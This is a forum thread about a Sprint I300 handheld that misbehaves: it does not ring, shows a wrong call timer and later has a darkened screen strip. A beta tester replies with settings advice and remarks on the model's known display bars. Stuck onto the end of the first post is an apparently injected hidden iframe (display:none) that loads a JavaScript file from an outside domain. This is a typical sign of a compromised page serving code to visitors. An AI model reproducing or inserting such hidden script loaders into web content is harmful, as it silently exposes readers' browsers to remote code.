+ Reply to Thread

Thumbs down I300 acting SUPER buggy

I just activated my I300 today...

So far, I've noticed the following.

It never rings when I'm getting a call, yet if I hit End, sometimes it then realizes it's getting a call (I tested this by using my landline).

When I call someone with it, the screen doesn't have the right call time displayed... and as a matter of fact, unless I hit Clear, it doesn't keep track of the time of the call at all. But the little screen on top does.

Anyone ever seen anything like this? I've tried two different batteries and I've reset, then hard reset it. No change. Someone help me please!

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

sprint pcs beta tester macmetal666's Avatar
    sounds like the problem you are having is with the settings inside the unit.

take the unit to a pcs store and ask the tech to check the settings in the service menu #3.

it seems that the unit has service but doesnt have the correct setting to get the time and date plus deliver your calls from the tower.

the other thing that will do this is if you have 2 phones connected to the same number/ when pcs changes esns on a phone without erasing the first one or a customer changes the mobile id inside a phone without disconnecting the first one etc.........
    my i500 is more obsolete than your ti-99 or apple IIe

Now that it's had a day, it's working fine. I did a hard reset, but even after that, the problems were persisting...

Then, this morning, it seemed to have worked itself out. I had switched phones, but kept the same number... I wonder if it takes a while on Sprint's end to work that all out...

PS - I have a new problem... the left-more quarter of the screen is darker than the rest. It's not a contrast issue. It almost reminds me of when a speaker (that's not magnetically shielded) is placed too close to a TV. But this discoloration on my screen stops at a specific point. And it's on the entire left side, making a straight line.

Thanks for replying macmetal. You're the troubleshooter around here it seems!

sprint pcs beta tester macmetal666's Avatar
    you must be new around here and to the i300.

this is the most familar sight in the i3 series. that wicked screen bars! they either go up and dpwn or side to side but never diagnal.
    this is something we have lived with for years and will probably live with till they die.

watch soon, just under the earpiece will start to get dark too..just like a half moon......then the graffiti area will just turn black....and then the bars will go away......then the unit crashes.....then the bars come back and stay for a while...and then ........etc

just one of the bugs that never got fully worked out...

btw glad to help out
    my i500 is more obsolete than your ti-99 or apple IIe

Originally posted by macmetal666
    watch soon, just under the earpiece will start to get dark too..just like a half moon......then the graffiti area will just turn black....and then the bars will go away......then the unit crashes.....then the bars come back and stay for a while...and then ........etc
    Hope not...